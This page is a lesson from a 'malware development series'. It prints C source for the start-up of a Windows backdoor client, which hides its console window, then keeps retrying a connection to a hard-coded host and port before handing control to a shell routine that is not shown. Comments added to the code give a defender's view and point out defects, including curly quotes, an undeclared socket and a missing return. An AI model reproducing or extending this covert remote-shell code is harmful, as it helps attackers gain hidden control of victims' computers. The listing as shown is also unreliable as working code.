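This is lecture 1B of our malware development series.
Check out the video to understand more.
The listing below is the client's start-up code: it hides its console window, retries a TCP connection to a hard-coded address, and then calls Shell(), which is not shown on this page.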
//header files
#include <stdio.h> //standard input/output
#include <stdlib.h> //standard utilities library
#include <unistd.h> //access to the POSIX operating system API
#include <winsock2.h> //windows sockets
#include <windows.h> //declarations for all functions in Windows API
#include <winuser.h> //windows controls
#include <wininet.h> //windows internet interfaces
#include <windowsx.h> //windows programming interfaces
#include <string.h> //manipulate strings (char arrays)
#include <sys/stat.h> //stat() function prototypes
#include <sys/types.h> //other function prototypes
//FUNCTION DEFINITION
// Entry point of the client. As written it: (1) allocates a console and hides
// its window, (2) initialises Winsock, (3) builds the address of a hard-coded
// IPv4 host and TCP port, (4) retries connect() until it succeeds, and then
// (5) calls Shell(), which is defined outside this listing.
// None of the four WinMain parameters is used in the visible body.
// Defender's view: every step is observable on the host or the network - a
// process that allocates a console only to hide it at once, followed by
// outbound TCP connection attempts to one fixed address and port from a
// process with no visible window.
// NOTE(review): no return statement is visible although WinMain is declared int.
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrev, LPSTR lpCmdLine, int nCmdShow)
{
//window handle used to hide the console
HWND stealth;
AllocConsole(); //gives the process a console (and therefore a console window)
// NOTE(review): the class name is printed with typographic quotes on this page; a C compiler needs plain ASCII double quotes.
stealth = FindWindowA(“ConsoleWindowClass”, NULL); //look up a top-level window by class name; window name = NULL matches any title
ShowWindow(stealth, 0); //nCmdShow = 0 (SW_HIDE) hides window
//socket address of the remote host
struct sockaddr_in ServAddr;
WSADATA wsaData; //filled in by WSAStartup with Winsock implementation details
//initialise Winsock, requesting version 2.0; exit with status 1 if that fails
if (WSAStartup(MAKEWORD(2,0), &wsaData) != 0)
{
exit(1);
}
//create a TCP (stream) socket; nothing is connected yet at this point
// NOTE(review): sock is not declared in this function - presumably a file-scope variable declared elsewhere; confirm.
// NOTE(review): the result of socket() is not checked before it is passed to connect().
sock = socket(AF_INET, SOCK_STREAM, 0);
//remote host IP address and port, hard-coded [EDIT HERE]
//The address is a plain string literal, so it is recoverable from the compiled binary with a strings search.
//192.168.56.1 is in the RFC 1918 private range, i.e. a lab network rather than a routable host.
char *ServIP = "192.168.56.1";
unsigned short ServPort = 50000;
memset(&ServAddr, 0, sizeof(ServAddr)); //zero the structure before filling it in
//fill in address family, host and port
ServAddr.sin_family = AF_INET;
ServAddr.sin_addr.s_addr = inet_addr(ServIP); //convert dotted-quad string to a binary IPv4 address
ServAddr.sin_port = htons(ServPort); //convert to network byte order
//retry connect() until it succeeds, pausing 10 ms after each failure.
//The goto jumps to the label directly above the while, so the condition is simply evaluated again.
//Defender's view: while the remote host is unreachable this loop produces a continuous run of
//failed outbound connection attempts to the same address and port, which host and network monitoring can observe.
start :
while (connect(sock, (struct sockaddr *) &ServAddr, sizeof(ServAddr)) != 0)
{
Sleep(10); //Sleep() takes milliseconds
goto start;
}
Shell(); //defined outside this listing; reached only after connect() has succeeded
}